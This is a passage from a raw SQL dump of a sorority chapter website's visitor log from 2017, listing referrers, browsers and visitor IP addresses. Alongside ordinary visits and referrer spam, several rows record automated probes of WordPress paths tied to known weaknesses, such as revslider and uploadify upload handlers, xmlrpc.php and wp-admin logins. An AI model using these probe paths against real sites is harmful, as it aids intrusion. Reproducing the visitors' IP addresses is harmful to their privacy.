.211','000',4,0),(2602,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','87.236.20.140','000',1,0),(2603,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.202','000',1,0),(2604,'2017-03-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','108.179.200.141','000',1,0),(2605,'2017-03-30','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.130.117','000',4,0),(2606,'2017-03-30','https://www.bing.com/','Silk','Kindle Fire','56.2.4','','68.134.4.67','000',1,0),(2607,'2017-03-30','http://zphiblgz.org','Safari','iPhone','10.0','','173.67.3.30','000',3,0),(2608,'2017-03-30','http://zphiblgz.org','Safari','Macintosh','10.0.1','','173.67.3.30','000',5,0),(2609,'2017-03-30','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','152.33.19.180','000',1,0),(2610,'2017-03-30','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(2611,'2017-03-30','https://search.yahoo.com/','Firefox','Windows','52.0','','71.244.153.110','000',4,0),(2612,'2017-03-30','http://evrotekhservis.ru/','MSIE','Windows','5.5','','37.115.191.53','000',2,0),(2613,'2017-03-30','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',1,0),(2614,'2017-03-30','http://x-true.info/','MSIE','Windows','5.5','','46.118.115.43','000',2,0),(2615,'2017-03-30','https://www.google.com/','Safari','Macintosh','10.0.3','','184.36.7.76','000',2,0),(2616,'2017-03-30','http://zphiblgz.org','MSIE','Windows','11.0','','23.229.104.238','000',1,0),(2617,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','220.86.44.182','000',2,0),(2618,'2017-03-31','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.167.196','000',2,0),(2619,'2017-03-31','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.28.123','000',13,0),(2620,'2017-03-31','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.24.131','000',41,0),(2621,'2017-03-31','http://life-instyle.com/','Opera','Windows','7.0','','176.8.251.60','000',2,0),(2622,'2017-03-31','http://zphiblgz.org','Firefox','Windows','50.0','','82.146.34.62','000',3,0),(2623,'2017-03-31','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.186.134','000',49,0),(2624,'2017-03-31','http://zphiblgz.org','Chrome','Macintosh','53.0.2785.143','','52.36.202.41','000',1,0),(2625,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','88.150.157.77','000',2,0),(2626,'2017-03-31','http://zphiblgz.org/feed/','MSIE','Windows','6.0','','46.161.61.95','000',1,0),(2627,'2017-03-31','http://zphiblgz.org','Safari','iPhone','9.0','','174.204.20.77','000',4,0),(2628,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','80.217.63.191','000',2,0),(2629,'2017-03-31','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.159.88','000',10,0),(2630,'2017-03-31','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.185.0.83','000',6,0),(2631,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','124.82.92.100','000',2,0),(2632,'2017-03-31','http://www.bing.com/search?q=zeta+phi+beta+sorority+inc+lambda+chapter&src=IE-SearchBox&FORM=IENTTR&conversationid=&adlt=strict','MSIE','Windows','11.0','','74.124.47.10','000',1,0),(2633,'2017-03-31','http://zphiblgz.org','Microsoft','Unknown','Unknown','','100.16.224.211','000',2,0),(2634,'2017-03-31','http://zphiblgz.org','MSIE','Windows','7.0','','100.16.224.211','000',2,0),(2635,'2017-03-31','http://zphiblgz.org','Edge','Windows','14.14393','','100.16.224.211','000',1,0),(2636,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','120.89.109.241','000',2,0),(2637,'2017-03-31','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(2638,'2017-03-31','https://www.google.com/','Chrome','Windows','56.0.2924.87','','74.118.219.2','000',1,0),(2639,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','189.50.129.161','000',2,0),(2640,'2017-03-31','http://zphiblgz.org','Chrome','Windows','55.0.2883.75','','12.183.71.35','000',2,0),(2641,'2017-03-31','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&e=ATPxTNqDb-NsfAJ-cLco2q3wRoaLX58kDlRSsgj8mhX9YDDaklWE4ULH5OEjLk54SUzMV40','AppleWebKit','iPhone','602.3.12','','73.213.36.209','000',5,0),(2642,'2017-03-31','https://www.google.com/','Safari','iPhone','10.0','','173.69.178.93','000',1,0),(2643,'2017-03-31','http://zphiblgz.org/wp-includes/wp-inc.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(2644,'2017-03-31','https://www.google.com/','Chrome','Windows','49.0.2623.112','','73.132.237.11','000',6,0),(2645,'2017-03-31','http://krasnodar.dengi-pod-zalog-nedvizhimosti.ru/','MSIE','Windows','6.0','','37.115.191.53','000',5,0),(2646,'2017-03-31','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','137.200.0.109','000',4,0),(2647,'2017-03-31','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.122','000',1,0),(2648,'2017-03-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(2649,'2017-03-31','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(2650,'2017-03-31','http://zphiblgz.org','MSIE','Windows','11.0','','214.36.0.135','000',1,0),(2651,'2017-03-31','http://zphiblgz.org','Safari','iPhone','10.0','','172.56.2.203','000',2,0),(2652,'2017-03-31','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.244.146.193','000',4,0),(2653,'2017-03-31','http://zphiblgz.org','MSIE','Unknown','9.0','','208.110.85.226','000',5,0),(2654,'2017-03-31','https://www.google.com/','Chrome','Windows','56.0.2924.87','','76.21.220.89','000',4,0),(2655,'2017-03-31','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','69.137.152.6','000',7,0),(2656,'2017-03-31','https://b-styles.xyz/','MSIE','Windows','6.0','','46.118.122.226','000',9,0),(2657,'2017-03-31','http://zphiblgz.org','Chrome','Windows','57.0.2987.98','','72.81.227.173','000',1,0),(2658,'2017-03-31','http://kashubadesign.ru/','MSIE','Windows','6.0','','46.118.115.43','000',1,0),(2659,'2017-03-31','http://zphiblgz.org','Firefox','Windows','40.1','','152.238.33.102','000',2,0),(2660,'2017-03-31','http://l.instagram.com/?e=ATM6NpHlaTVT9THNi8ojWBOnu0wXvet5Pr9sFK5RVxm8vcnw0BMtAI8jvHMC05EyUcwzijY&u=http%3A%2F%2Fwww.zphiblgz.org%2F','Chrome','Android','56.0.2924.87','','100.15.147.98','000',2,0),(2661,'2017-03-31','http://zphiblgz.org','MSIE','Unknown','9.0','','69.84.207.250','000',9,0),(2662,'2017-03-31','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','68.33.94.81','000',4,0),(2663,'2017-03-31','http://zphiblgz.org','MSIE','Windows','9.0','','65.55.218.50','000',1,0),(2664,'2017-03-31','http://zphiblgz.org/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','Chrome','Windows','42.0.2311.152','','216.244.85.147','000',1,0),(2665,'2017-04-01','http://zphiblgz.org','Firefox','Windows','40.1','','59.7.180.173','000',1,0),(2666,'2017-04-01','http://zphiblgz.org','MSIE','Windows','11.0','','198.50.180.169','000',2,0),(2667,'2017-04-01','http://zphiblgz.org/membership/','MSIE','Windows','11.0','','89.32.69.198','000',1,0),(2668,'2017-04-01','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','176.8.251.60','000',2,0),(2669,'2017-04-01','http://www.partybunny.ru/','MSIE','Windows','6.0','','37.115.191.53','000',2,0),(2670,'2017-04-01','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','8.0','','5.61.34.51','000',2,0),(2671,'2017-04-01','http://zphiblgz.org','Firefox','Windows','40.1','','89.46.181.152','000',2,0),(2672,'2017-04-01','http://zphiblgz.org/','Chrome','Windows','44.0.2403.125','','95.211.138.129','000',1,0),(2673,'2017-04-01','http://zphiblgz.org','Firefox','Windows','40.1','','187.223.85.63','000',2,0),(2674,'2017-04-01','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',14,0),(2675,'2017-04-01','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2F&e=ATP0TJZZ3Qnu72XPjv5tZpba96BhfpBROngUnSX2KLj3MW3s3g2LIHNs7xQJr5NUZTriyOo','Chrome','Android','33.0.0.0','','138.238.233.11','000',2,0),(2676,'2017-04-01','http://zphiblgz.org','Safari','Linux','538.1','','67.217.35.167','000',2,0),(2677,'2017-04-01','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.180.244.132','000',9,0),(2678,'2017-04-01','http://www.avtolombard-krasnodar.com/','Opera','Windows','8.01','','37.115.186.195','000',3,0),(2679,'2017-04-01','https://www.google.com/','Chrome','Android','44.0.2403.133','','98.163.103.58','000',1,0),(2680,'2017-04-01','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(2681,'2017-04-01','http://w3data.co/profile.php?lookup=zphiblgz.org','Chrome','Windows','40.0.2214.115','','104.156.230.231','000',1,0),(2682,'2017-04-01','http://wsgames.ru/','Opera','Windows','8.01','','46.118.115.43','000',3,0),(2683,'2017-04-01','http://mega-polis.biz.ua/','MSIE','Windows','6.0','','46.118.122.226','000',2,0),(2684,'2017-04-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(2685,'2017-04-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(2686,'2017-04-01','http://zphiblgz.org','Firefox','Windows','40.1','','31.179.71.72','000',2,0),(2687,'2017-04-01','http://zphiblgz.org','Firefox','Windows','40.1','','2.80.25.243','000',2,0),(2688,'2017-04-01','http://zphiblgz.org/wp-content/upgrade/theme-compat/popup-pomo.php','Chrome','Windows','42.0.2311.152','','216.244.85.147','000',1,0),(2689,'2017-04-01','http://udsgame.online/','MSIE','Windows','6.0','','37.115.186.195','000',1,0),(2690,'2017-04-01','http://zphiblgz.org','Chrome','Macintosh','41.0.2274.87','','107.172.68.190','000',2,0),(2691,'2017-04-01','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(2692,'2017-04-01','http://zphiblgz.org','MSIE','Windows','10.0','','213.239.205.118','000',5,0),(2693,'2017-04-01','http://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',1,0),(2694,'2017-04-01','http://buypuppies.ca/','MSIE','Windows','6.0','','46.118.115.43','000',2,0),(2695,'2017-04-01','http://zphiblgz.org','Chrome','Windows','32.0.1700.41','','213.239.205.118','000',5,0),(2696,'2017-04-02','http://zphiblgz.org','MSIE','Windows','9.0','','144.76.80.151','000',5,0),(2697,'2017-04-02','http://zphiblgz.org','MSIE','Windows','9.0','','65.55.218.35','000',1,0),(2698,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','86.236.62.173','000',1,0),(2699,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','182.50.130.196','000',1,0),(2700,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','5.61.27.86','000',1,0),(2701,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.40.232','000',1,0),(2702,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.85.11.100','000',1,0),(2703,'2017-04-02','http://life-instyle.com/','MSIE','Unknown','6.0','','176.8.251.60','000',3,0),(2704,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','210.134.165.2','000',1,0),(2705,'2017-04-02','http://zphiblgz.org','Chrome','Android','39.0.2171.93','','66.87.148.231','000',1,0),(2706,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.114','000',1,0),(2707,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','164.132.164.149','000',1,0),(2708,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','91.208.99.2','000',1,0),(2709,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','80.88.86.23','000',1,0),(2710,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.168','000',1,0),(2711,'2017-04-02','http://krasivoe-hd.net/','Opera','Windows','8.01','','37.115.186.195','000',2,0),(2712,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','207.158.15.105','000',1,0),(2713,'2017-04-02','http://zphiblgz.org','Firefox','Windows','40.1','','185.127.196.36','000',1,0),(2714,'2017-04-02','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(2715,'2017-04-02','74.220.219.51','Firefox','Windows','33.0','','162.243.69.215','000',2,0),(2716,'2017-04-02','http://www.bookmaker-bet.com/','Opera','Windows','7.02','','37.115.191.53','000',3,0),(2717,'2017-04-02','http://zphiblgz.org','Firefox','Windows','40.1','','61.0.228.34','000',2,0),(2718,'2017-04-02','http://zphiblgz.org','MSIE','Windows','8.0','','234.71.120.126','000',1,0),(2719,'2017-04-02','http://krasnodar.dengi-pod-zalog-nedvizhimosti.ru/','MSIE','Windows','6.0','','37.115.191.53','000',2,0),(2720,'2017-04-02','http://zphiblgz.org/wp-admin/admin-ajax.php','Chrome','Windows','42.0.2311.152','','216.244.85.147','000',1,0),(2721,'2017-04-02','http://zphiblgz.org','Chrome','Macintosh','51.0.2704.106','','52.202.3.120','000',2,0),(2722,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',14,0),(2723,'2017-04-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(2724,'2017-04-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(2725,'2017-04-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','110.83.60.212','000',10,0),(2726,'2017-04-02','http://zphiblgz.org','Firefox','Windows','40.1','','116.72.193.145','000',1,0),(2727,'2017-04-02','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','52.90.46.1','000',6,0),(2728,'2017-04-02','http://zphiblgz.org','Firefox','Windows','40.1','','41.188.79.196','000',2,0),(2729,'2017-04-02','http://zphiblgz.org','Firefox','Windows','40.1','','200.86.116.110','000',2,0),(2730,'2017-04-02','http://oil-td.ru/','MSIE','Windows','6.0','','46.118.115.43','000',3,0),(2731,'2017-04-02','https://www.google.com/','Safari','iPhone','10.0','','172.56.2.108','000',1,0),(2732,'2017-04-02','http://fable.in.ua/','MSIE','Unknown','7.0b','','46.118.122.226','000',3,0),(2733,'2017-04-02','https://www.google.com/','Safari','iPhone','602.1','','24.189.255.113','000',17,0),(2734,'2017-04-02','http://zajm-zalog-krasnodar.ru/','Opera','Windows','8.01','','37.115.191.53','000',1,0),(2735,'2017-04-02','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','208.94.228.248','000',1,0),(2736,'2017-04-02','http://zphiblgz.org','Safari','Windows','3.1.2','','46.28.66.2','000',14,0),(2737,'2017-04-02','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Safari','Windows','3.1.2','','79.110.25.247','000',2,0),(2738,'2017-04-02','http://produkto.net/','MSIE','Windows','6.0','','46.118.122.226','000',5,0),(2739,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','36.74.72.246','000',2,0),(2740,'2017-04-03','http://krasnodar-avtolombards.ru/','MSIE','Windows','6.0','','176.8.251.60','000',1,0),(2741,'2017-04-03','http://zpg-headteacher.comuf.com/vrazki.html','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(2742,'2017-04-03','http://www.partybunny.ru/','MSIE','Windows','6.0','','37.115.191.53','000',1,0),(2743,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.59.34','000',1,0),(2744,'2017-04-03','http://zphiblgz.org/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(2745,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','23.21.112.27','000',7,0),(2746,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','24.121.62.47','000',2,0),(2747,'2017-04-03','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.84','000',2,0),(2748,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','41.136.196.43','000',2,0),(2749,'2017-04-03','http://zphiblgz.org','MSIE','Windows','6.0','','191.101.24.173','000',1,0),(2750,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','59.152.99.86','000',2,0),(2751,'2017-04-03','http://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/','Unknown','Unknown','Unknown','','37.115.186.195','000',3,0),(2752,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','105.111.94.70','000',2,0),(2753,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','92.137.156.12','000',2,0),(2754,'2017-04-03','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','8.0','','5.61.34.51','000',1,0),(2755,'2017-04-03','http://zphiblgz.org/wp-admin/','MSIE','Windows','9.0','','5.61.34.51','000',1,0),(2756,'2017-04-03','http://www.zphibmaryland.org/chapters/','Chrome','Android','44.0.2403.133','','166.137.248.109','000',2,0),(2757,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.82','000',1,0),(2758,'2017-04-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(2759,'2017-04-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(2760,'2017-04-03','http://nalogovyy-kodeks.ru/','MSIE','Windows','6.0','','46.118.122.226','000',2,0),(2761,'2017-04-03','https://www.google.com/','Chrome','Windows','54.0.2840.99','','161.31.44.65','000',1,0),(2762,'2017-04-03','http://taxi-v-eisk.ru/','MSIE','Windows','6.0','','46.118.115.43','000',3,0),(2763,'2017-04-03','https://atleticpharm.org/','Opera','Windows','8.01','','37.115.186.195','000',3,0),(2764,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','138.186.222.64','000',2,0),(2765,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.169.81.54','000',2,0),(2766,'2017-04-03','android-app://com.google.android.googlequicksearchbox','Chrome','Android','56.0.2924.87','','76.234.234.90','000',1,0),(2767,'2017-04-03','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(2768,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','205.204.76.192','000',1,0),(2769,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','187.95.195.214','000',1,0),(2770,'2017-04-03','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','73.133.254.145','000',1,0),(2771,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','208.82.113.84','000',1,0),(2772,'2017-04-03','http://zphiblgz.org','Safari','iPad','10.0','','68.134.16.45','000',1,0),(2773,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.210.232.73','000',1,0),(2774,'2017-04-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','89.42.216.240','000',1,0),(2775,'2017-04-03','https://www.google.com/','Safari','iPhone','8.0','','174.205.8.79','000',1,0),(2776,'2017-04-03','http://zphiblgz.org','Firefox','Windows','40.1','','177.192.73.100','000',1,0),(2777,'2017-04-04','http://evrotekhservis.ru/','MSIE','Windows','6.0','','37.115.191.53','000',3,0),(2778,'2017-04-04','https://digital-sale.su/','MSIE','Windows','6.0','','37.115.186.195','000',3,0),(2779,'2017-04-04','http://zphiblgz.org','Firefox','Windows','40.1','','27.5.149.105','000',1,0),(2780,'2017-04-04','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(2781,'2017-04-04','http://xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai/','MSIE','Windows','2.0','','46.118.115.43','000',3,0),(2782,'2017-04-04','https://www.google.com/','Safari','iPhone','10.0','','73.132.240.126','000',1,0),(2783,'2017-04-04','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','51.235.0.130','000',1,0),(2784,'2017-04-04','http://xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai/','Opera','Windows','8.01','','37.115.186.195','000',1,0),(2785,'2017-04-04','https://www.google.com/','Safari','iPhone','10.0','','71.244.200.186','000',4,0),(2786,'2017-04-04','https://www.google.com/','Chrome','Windows','56.0.2924.87','','152.26.56.233','000',3,0),(2787,'2017-04-04','http://zphiblgz.org','Firefox','Windows','40.1','','191.180.183.236','000',1,0),(2788,'2017-04-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.55.58','000',5,0),(2789,'2017-04-04','https://www.google.com/','Chrome','Windows','56.0.2924.87','','134.192.191.243','000',6,0),(2790,'2017-04-04','http://yur-p.ru/','MSIE','Windows','6.0','','46.118.115.43','000',2,0),(2791,'2017-04-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(2792,'2017-04-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(2793,'2017-04-04','http://zphiblgz.org','Firefox','Windows','40.1','','197.113.62.69','000',2,0),(2794,'2017-04-04','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','188.226.135.10','000',1,0),(2795,'2017-04-04','http://xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai/','Opera','Windows','9.00','','37.115.191.53','000',3,0),(2796,'2017-04-04','http://zphiblgz.org/','Chrome','Windows','48.0.2564.116','','37.115.153.54','000',4,0),(2797,'2017-04-04','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','86.110.118.142','000',4,0),(2798,'2017-04-04','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.190.196.52','000',1,0),(2799,'2017-04-04','http://zphiblgz.org/members/','Chrome','Windows','48.0.2564.97','','146.185.223.111','000',3,0),(2800,'2017-04-04','http://zphiblgz.org','Firefox','Linux','47.0','','50.190.196.52','000',5,0),(2801,'2017-04-04','http://zphiblgz.org/programs/','Chrome','Android','57.0.2987.132','','73.133.254.145','000',1,0),(2802,'2017-04-04','http://zphiblgz.org','MSIE','Windows','6.0','','89.163.152.135','000',1,0),(2803,'2017-04-04','http://zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','195.154.172.80','000',1,0),(2804,'2017-04-04','http://zphiblgz.org/','Opera','Windows','12.17','','104.227.49.197','000',7,0),(2805,'2017-04-04','http://zphiblgz.org/','PHP','Unknown','5.3.06','','104.227.49.197','000',1,0),(2806,'2017-04-04','http://zphiblgz.org','Firefox','Windows','40.1','','180.246.146.196','000',2,0),(2807,'2017-04-04','http://r.search.yahoo.com/_ylt=AwrBT7XAOeRYFV8AroFXNyoA;_ylu=X3oDMTEzMGM3c3E5BGNvbG8DYmYxBHBvcwMyBHZ0aWQDVUkwMkM1XzEEc2VjA3Ny/RV=2/RE=1491380801/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=lb8lSzaT_PsJNNs4i4iJsYd2yUU-','Safari','Macintosh','10.0.2','','172.56.23.234','000',1,0),(2808,'2017-04-04','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.179.85.13','000',1,0),(2809,'2017-04-04','http://fable.in.ua/','MSIE','Windows','6.0','','46.118.122.226','000',3,0),(2810,'2017-04-04','http://mosrif.ru/','MSIE','Windows','5.5','','46.118.115.43','000',2,0),(2811,'2017-04-04','http://xxxnatelefon.ru/','MSIE','Windows','3.02','','37.115.191.53','000',1,0),(2812,'2017-04-04','http://zona-aqua.ru/','MSIE','Windows','6.0','','5.248.196.222','000',3,0),(2813,'2017-04-04','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(2814,'2017-04-05','http://zoukmania.com/wp-admin/admin-ajax.php?action=revslider_ajax_action','Opera','Macintosh','11.10','','192.36.27.4','000',2,0),(2815,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','112.198.73.150','000',1,0),(2816,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','202.9.41.219','000',2,0),(2817,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','91.68.37.209','000',1,0),(2818,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','5.21.252.176','000',1,0),(2819,'2017-04-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','203.115.141.244','000',1,0),(2820,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','94.63.78.224','000',2,0),(2821,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','105.110.79.241','000',2,0),(2822,'2017-04-05','http://zphiblgz.org/','Chrome','Windows','39.0.2171.99','','195.154.172.80','000',1,0),(2823,'2017-04-05','http://zphiblgz.org/','Opera','Windows','12.17','','104.227.168.110','000',7,0),(2824,'2017-04-05','http://zphiblgz.org/','PHP','Unknown','5.3.74','','104.227.168.110','000',1,0),(2825,'2017-04-05','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','188.226.129.55','000',1,0),(2826,'2017-04-05','http://zphiblgz.org','Firefox','Macintosh','49.0','','8.21.241.165','000',5,0),(2827,'2017-04-05','http://zphiblgz.org','MSIE','Windows','11.0','','195.154.191.62','000',1,0),(2828,'2017-04-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(2829,'2017-04-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(2830,'2017-04-05','http://zphiblgz.org/','Opera','Windows','7.02','','176.109.241.146','000',3,0),(2831,'2017-04-05','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.11.147','000',5,0),(2832,'2017-04-05','https://www.google.com/','Chrome','Windows','56.0.2924.87','','8.21.241.165','000',3,0),(2833,'2017-04-05','https://www.bing.com/','Edge','Windows','14.14393','','108.70.15.161','000',1,0),(2834,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','65.175.220.107','000',2,0),(2835,'2017-04-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','187.45.193.220','000',1,0),(2836,'2017-04-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','98.130.0.237','000',1,0),(2837,'2017-04-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.247.111.23','000',1,0),(2838,'2017-04-05','http://zphiblgz.org','Firefox','Macintosh','29.0','','54.221.104.233','000',1,0),(2839,'2017-04-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.46.19','000',1,0),(2840,'2017-04-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.71.32.12','000',1,0),(2841,'2017-04-05','http://zphiblgz.org/scholarship/','Safari','iPhone','10.0','','73.213.22.160','000',1,0),(2842,'2017-04-05','http://zphiblgz.org','Firefox','Windows','40.1','','118.92.172.187','000',2,0),(2843,'2017-04-05','http://sexreliz.com/','MSIE','Windows','6.0','','46.118.122.226','000',1,0),(2844,'2017-04-05','http://running-line.ru/','MSIE','Windows','5.0','','46.118.115.43','000',1,0),(2845,'2017-04-05','http://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/','MSIE','Unknown','6.0','','37.115.186.195','000',3,0),(2846,'2017-04-05','https://groupmoney.ru/','MSIE','Windows','6.0','','37.115.186.195','000',3,0),(2847,'2017-04-06','http://www.ic-tuebingen.de/','MSIE','Windows','6.0','','37.115.191.53','000',8,0),(2848,'2017-04-06','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','26.0.1410.64','','5.61.32.26','000',1,0),(2849,'2017-04-06','http://zphiblgz.org/wp-admin/','Firefox','Windows','14.0.1','','5.61.32.26','000',1,0),(2850,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','118.209.137.125','000',1,0),(2851,'2017-04-06','http://www.zphibmaryland.org/chapters/','Chrome','Windows','57.0.2987.133','','72.71.139.19','000',5,0),(2852,'2017-04-06','http://xow.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action','Opera','Windows','9.22','','163.172.67.180','000',2,0),(2853,'2017-04-06','http://zphiblgz.org','Firefox','Windows','40.1','','79.167.140.73','000',2,0),(2854,'2017-04-06','https://digital-sale.su/','MSIE','Windows','4.01','','37.115.186.195','000',3,0),(2855,'2017-04-06','http://zphiblgz.org/xmlrpc.php','Chrome','Windows','53.0.2785.143','','59.170.13.110','000',1,0),(2856,'2017-04-06','http://zphiblgz.org','Opera 